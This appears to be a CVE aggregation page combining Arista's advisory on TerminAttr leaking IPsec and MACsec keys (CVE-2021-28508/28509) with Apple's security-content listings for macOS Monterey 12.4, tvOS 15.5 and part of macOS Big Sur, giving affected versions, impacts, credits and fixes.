This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols. The impact of this vulnerability is that, in certain conditions, TerminAttr might leak IPsec sensitive data in clear text in CVP to other authorized users, which could cause IPsec traffic to be decrypted or modified by other authorized users on the device.

****Date:** May 25th, 2022**

Revision

Date

Changes

1.0

May 25th 2022

Initial release

**CVE-2021-28508**

*   CVSSv3.1 Base Score: 6.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H)
*   CWE: CWE-255 Credentials Management Errors
*   Tracking bug:  BUG635204 (TerminAttr), BUG664159 (Octa)

**CVE-2021-28509**

*   CVSSv3.1 Base Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)
*   CWE: CWE-255 Credentials Management Errors
*   Tracking bug: BUG643445 (TerminAttr), BUG664160 (Octa)

**Description**

This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols.

The impact of this vulnerability is that,  in certain conditions, TerminAttr might leak IPsec (CVE-2021-28508) and MACsec (CVE-2021-28509) sensitive data in clear text in CVP to other authorized users, which could cause IPsec and MACsec traffic to be decrypted or modified by other authorized users on the device.

This issue was discovered internally and Arista is not aware of any malicious uses of this issue in customer networks.

****Vulnerability Assessment********Affected Software******CVE-2021-28508**

**EOS versions:**

*   4.23.11 and below release in the 4.23.x train
*   4.24.9 and below release in the 4.24.x train
*   4.25.7 and below releases in the 4.25.x train
*   4.26.5 and below releases in the 4.26.x train
*   4.27.1 and below releases in the 4.27.x train

**TerminAttr versions:**

*   TerminAttr v1.10.10 and all prior releases
*   TerminAttr v1.16.7 and all prior releases in the v1.11.x-v1.16.x trains
*   TerminAttr v1.18.1 and all prior releases in the v1.17.x-v1.18.x trains

**CVE-2021-28509**

**EOS versions:**

*   4.23.11 and below release in the 4.23.x train
*   4.24.9 and below release in the 4.24.x train
*   4.25.7 and below releases in the 4.25.x train
*   4.26.5 and below releases in the 4.26.x train
*   4.27.3 and below releases in the 4.27.x train

**TerminAttr versions:**

*   TerminAttr v1.10.10 and all prior releases
*   TerminAttr v1.16.7 and all prior releases in the v1.11.x-v1.16.x trains
*   TerminAttr v1.19.1 and all prior releases in the v1.17.x-v1.19.x trains

**Affected Platforms**

All EOS-based platforms that support IPsec or MACsec with the versions identified above are affected with TerminAttr enabled on the device.

Arista EOS-based products that support IPsec:

*   DCS-7020SRG
*   DCS-7280CR3MK

Arista EOS-based products that support MACsec:

*   722XP series
*   7050X3 series
*   7280R/R2/R3 series
*   7388X5 series
*   7500R/R2/R3 series
*   7800R3 series

The following products are **not** affected:

*   Arista EOS-based products:  
    *   710P series
    *   750X series
    *   7010/X series
    *   7050X/X2/X4 series
    *   7060X/X2/X4 series
    *   7130 series
    *   7150 series
    *   7160 series
    *   7170 series
    *   7250X series
    *   7260X/X3 series
    *   7300X series
    *   7320X series
    *   7358X4 series
    *   7368X4 series
    *   7388X5 series
*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   Arista 7130 Systems running MOS
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Awake Security Platform

**Required Configuration for Exploitation**

The prerequisite for both CVEs is that TerminAttr is enabled on the device

daemon TerminAttr
   exec /usr/bin/TerminAttr ...
   no shutdown

**CVE-2021-28508**

IPsec is configured on device

ip security
   profile Arista
      ike-policy ikedefault
      sa-policy sadefault
      connection start
      shared-key 7 047A190F1C354D
      mode transport

**CVE-2021-28509**

MACsec is configured on device

mac security             
   profile Arista
      key 0abc1234 7 06070E234E4D0A48544540585F507E
      key 0def5678 7 09484A0C1C0311475E5A527D7C7C70 fallback
  
interface Ethernet6/1    
   mac security profile Arista

**Indicators of Compromise**

Check if TerminAttr is running on the device, with the affected version mentioned above.

To check the installed TerminAttr version on the system, use the following command:

#show version detail | grep TerminAttr-core
TerminAttr-core      v1.13.3         1

To check if TerminAttr is running, use the following command and make sure  there's a PID allocated to the process

#show daemon TerminAttr
Process: TerminAttr (running with PID 2430)

****Mitigation****

The following configuration changes may be made in order to mitigate the exploitation of the listed vulnerability.

On the affected versions, the vulnerabilities can be mitigated by disabling TerminAttr agent.

daemon TerminAttr
   shutdown

**Resolution**

The recommended resolution is to upgrade to a remediated software version at your earliest convenience.

**CVE-2021-28508**

The vulnerability is fixed in the following versions:

**EOS versions:**

*   4.24.10 and later release in the 4.24.x train
*   4.25.8 and later releases in the 4.25.x train
*   4.26.6 and later releases in the 4.26.x train
*   4.27.2 and later releases in the 4.27.x train

**TerminAttr versions:**

*   TerminAttr v1.10.11 and later releases in the v1.10.x train
*   TerminAttr v1.16.8 and later releases in the v1.16.x train
*   TerminAttr v1.19.0 and later releases

**CVE-2021-28509**

The vulnerability is fixed in the following versions:

**EOS versions:**

*   4.24.10 and later release in the 4.24.x train
*   4.25.8 and later releases in the 4.25.x train
*   4.26.6 and later releases in the 4.26.x train
*   4.27.4 and later releases in the 4.27.x train

**TerminAttr versions:**

*   TerminAttr v1.10.11 and later releases
*   TerminAttr v1.16.8 and later releases in the v1.11.x-v1.16.x trains
*   TerminAttr v1.19.2 and later releases in the v1.17.x-v1.19.x trains

Note: TerminAttr has been bundled with every EOS release from 4.17.0F and above and it’s also available as a SWIX extension that can be used to upgrade TerminAttr to the latest version. For instructions on upgrading TerminAttr to the fixed release from CLI on EOS-based products, please refer to the article TerminAttr – Upgrade & Downgrade.

**Hotfix**

No hotfix is available for these CVEs.

**For More Information**

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

**Open a Service Request**

By email: This email address is being protected from spambots. You need JavaScript enabled to view it.  
By telephone: 408-547-5502 ; 866-476-0000

Contact information needed to open a new service request may be found at:  
https://www.arista.com/en/support/customer-support

CVE-2021-28508: Security Advisory 0077 - Arista

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. An application may be able to execute arbitrary code with kernel privileges.

Released May 16, 2022

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26772: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-26741: ABC Research s.r.o

CVE-2022-26742: ABC Research s.r.o

CVE-2022-26749: ABC Research s.r.o

CVE-2022-26750: ABC Research s.r.o

CVE-2022-26752: ABC Research s.r.o

CVE-2022-26753: ABC Research s.r.o

CVE-2022-26754: ABC Research s.r.o

**apache**

Available for: macOS Monterey

Impact: Multiple issues in apache

Description: Multiple issues were addressed by updating apache to version 2.4.53.

CVE-2021-44224

CVE-2021-44790

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-26698: Qi Sun of Trend Micro

**AVEVideoEncoder**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**Contacts**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26694: Wojciech Reguła (@\_r3ggi) of SecuRing

**CVMS**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A memory initialization issue was addressed.

CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori

CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

**DriverKit**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Monterey

Impact: Photo location information may persist after it is removed with Preview Inspector

Description: A logic issue was addressed with improved state management.

CVE-2022-26725: Andrew Williams and Avi Drissman of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26769: Antonio Zekic (@antoniozekic)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26756: Jack Dates of RET2 Systems, Inc

**IOKit**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved code execution in macOS Recovery may be able to escalate to kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26743: Jordy Zomer (@pwningsystems)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Monterey

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: macOS Monterey

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: The issue was addressed with additional permissions checks.

CVE-2022-26767: Wojciech Reguła (@\_r3ggi) of SecuRing

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@\_mxms) of the Google Security Team

CVE-2022-26708: Max Shavrick (@\_mxms) of the Google Security Team

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2022-26775: Max Shavrick (@\_mxms) of the Google Security Team

**LibreSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2022-0778

**libxml2**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**OpenSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-0778

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26712: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2022-26727: Mickey Jin (@patch1t)

**Preview**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26693: Wojciech Reguła (@\_r3ggi) of SecuRing

**Printing**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26746: @gorelics

**Safari Private Browsing**

Available for: macOS Monterey

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: macOS Monterey

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26723: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: A malicious application may be able to access restricted files

Description: This issue was addressed with improved entitlements.

CVE-2022-26728: Mickey Jin (@patch1t)

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: A validation issue existed in the handling of symlinks and was addressed with improved validation of symlinks.

CVE-2022-26704: an anonymous researcher

**TCC**

Available for: macOS Monterey

Impact: An app may be able to capture a user's screen

Description: This issue was addressed with improved checks.

CVE-2022-26726: an anonymous researcher

**Tcl**

Available for: macOS Monterey

Impact: A malicious application may be able to break out of its sandbox

Description: This issue was addressed with improved environment sanitization.

CVE-2022-26755: Arsenii Kostromin (0x3c3e)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: macOS Monterey

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26761: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

**zip**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to a denial of service

Description: A denial of service issue was addressed with improved state handling.

CVE-2022-0530

**zlib**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-25032: Tavis Ormandy

**zsh**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause arbitrary code execution

Description: This issue was addressed by updating to zsh version 5.8.1.

CVE-2021-45444

CVE-2022-26738: About the security content of macOS Monterey 12.4

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication.

Released May 16, 2022

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22675: an anonymous researcher

**AuthKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A local user may be able to enable iCloud Photos without authentication

Description: An authentication issue was addressed with improved state management.

CVE-2022-26724:  Jorge A. Caballero (@DataDrivenMD)

**AVEVideoEncoder**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**DriverKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**IOKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOMobileFrameBuffer**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**IOSurfaceAccelerator**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26771: an anonymous researcher

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libxml2**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**Security**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

CVE-2022-26724: About the security content of tvOS 15.5

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.3.1, iOS 15.4.1 and iPadOS 15.4.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..

Released May 16, 2022

**apache**

Available for: macOS Big Sur

Impact: Multiple issues in apache

Description: Multiple issues were addressed by updating apache to version 2.4.53.

CVE-2021-44224

CVE-2021-44790

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

**AppKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleAVD**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22675: an anonymous researcher

**AppleGraphicsControl**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-26698: Qi Sun of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

**CoreTypes**

Available for: macOS Big Sur

Impact: A malicious application may bypass Gatekeeper checks

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2022-22663: Arsenii Kostromin (0x3c3e)

**CVMS**

Available for: macOS Big Sur

Impact: A malicious application may be able to gain root privileges

Description: A memory initialization issue was addressed.

CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori

CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

**DriverKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**Graphics Drivers**

Available for: macOS Big Sur

Impact: A local user may be able to read kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2022-22674: an anonymous researcher

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26756: Jack Dates of RET2 Systems, Inc

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26769: Antonio Zekic (@antoniozekic)

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative

**IOMobileFrameBuffer**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**LaunchServices**

Available for: macOS Big Sur

Impact: A malicious application may be able to bypass Privacy preferences

Description: The issue was addressed with additional permissions checks.

CVE-2022-26767: Wojciech Reguła (@\_r3ggi) of SecuRing

**LaunchServices**

Available for: macOS Big Sur

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libresolv**

Available for: macOS Big Sur

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@\_mxms) of the Google Security Team

**LibreSSL**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2022-0778

**libxml2**

Available for: macOS Big Sur

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**OpenSSL**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-0778

**PackageKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26712: Mickey Jin (@patch1t)

**Printing**

Available for: macOS Big Sur

Impact: A malicious application may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26746: @gorelics

**Security**

Available for: macOS Big Sur

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**SMB**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Big Sur

